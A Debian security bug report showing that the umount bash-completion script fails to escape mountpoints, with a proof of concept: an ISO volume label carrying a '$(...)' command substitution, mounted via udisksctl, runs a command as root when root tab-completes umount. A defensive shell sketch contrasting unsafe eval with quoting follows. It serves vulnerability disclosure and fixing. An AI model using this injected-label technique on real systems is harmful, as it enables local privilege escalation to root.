Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security

Hi,

when bash-completion is installed, it uses /usr/share/bash-completion/completions/umount from the umount package to provide autocompletion. This script does not escape mount paths correctly, so it allows a local user with rights to mount filesystems to execute commands in the context of the umount user (probably root). Unprivileged users can mount filesystems with custom mountpoints using udisks2, FUSE or with the help of desktop environments.

Example:

as regular user:
------------------------------
$ mkdir empty
$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)
$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.
(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------

as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
# umount <TAB>
^C
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root     0 Feb 14 10:01 foo
------------------------------

I tested it using the latest Debian GNU/Linux 9.3 (stretch) with a default installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7

Björn Bosselmann
G DATA Software AG

-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information
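As a defensive illustration added here (this is not the Debian bash-completion script nor the util-linux fix linked in the report), the following shows the unsafe eval pattern beside a quoting pattern that keeps a mountpoint like the one above as plain data. The mount table is a constructed /proc/mounts sample, with a harmless echo standing in for touch.

```shell
#!/bin/sh
# Illustration only, not the Debian bash-completion or util-linux code:
# turn /proc/mounts-style input into umount completion candidates without
# letting shell metacharacters inside a mountpoint reach eval.

# Constructed sample in /proc/mounts format (a space in a path is encoded as
# \040). The third mountpoint carries a command substitution like the one in
# the report, with a harmless echo standing in for touch.
SAMPLE_MOUNTS='/dev/sda1 /boot ext4 rw 0 0
tmpfs /tmp tmpfs rw 0 0
/dev/loop0 /media/user/$(echo\040INJECTED) iso9660 ro 0 0'

# Undo the octal escapes /proc/mounts uses; the result is still untrusted.
decode_mountpoint() { printf '%b' "$1"; }

# Quote a string so the shell reads it back as one literal word:
# a'b becomes 'a'\''b'
shell_quote() { printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"; }

# Unsafe pattern: the raw mountpoint is spliced into text that is eval'ed, so
# $(...) inside the path runs in the shell of whoever presses TAB.
unsafe_candidates() {
    printf '%s\n' "$SAMPLE_MOUNTS" | while read -r _dev mp _rest; do
        mp=$(decode_mountpoint "$mp")
        eval "echo $mp"
    done
}

# Safe pattern: each candidate is quoted before it is handed on and nothing
# is eval'ed, so the path stays data no matter what it contains.
safe_candidates() {
    printf '%s\n' "$SAMPLE_MOUNTS" | while read -r _dev mp _rest; do
        mp=$(decode_mountpoint "$mp")
        shell_quote "$mp"
        printf '\n'
    done
}

# Returns 0 when the quoted third candidate reads back as the original path.
roundtrip_ok() {
    want='/media/user/$(echo INJECTED)'
    got=$(safe_candidates | sed -n 3p)
    eval "back=$got"
    [ "$back" = "$want" ]
}
```

Running unsafe_candidates prints /media/user/INJECTED for the third entry, i.e. the substitution executed, while safe_candidates emits the quoted literal '/media/user/$(echo INJECTED)'.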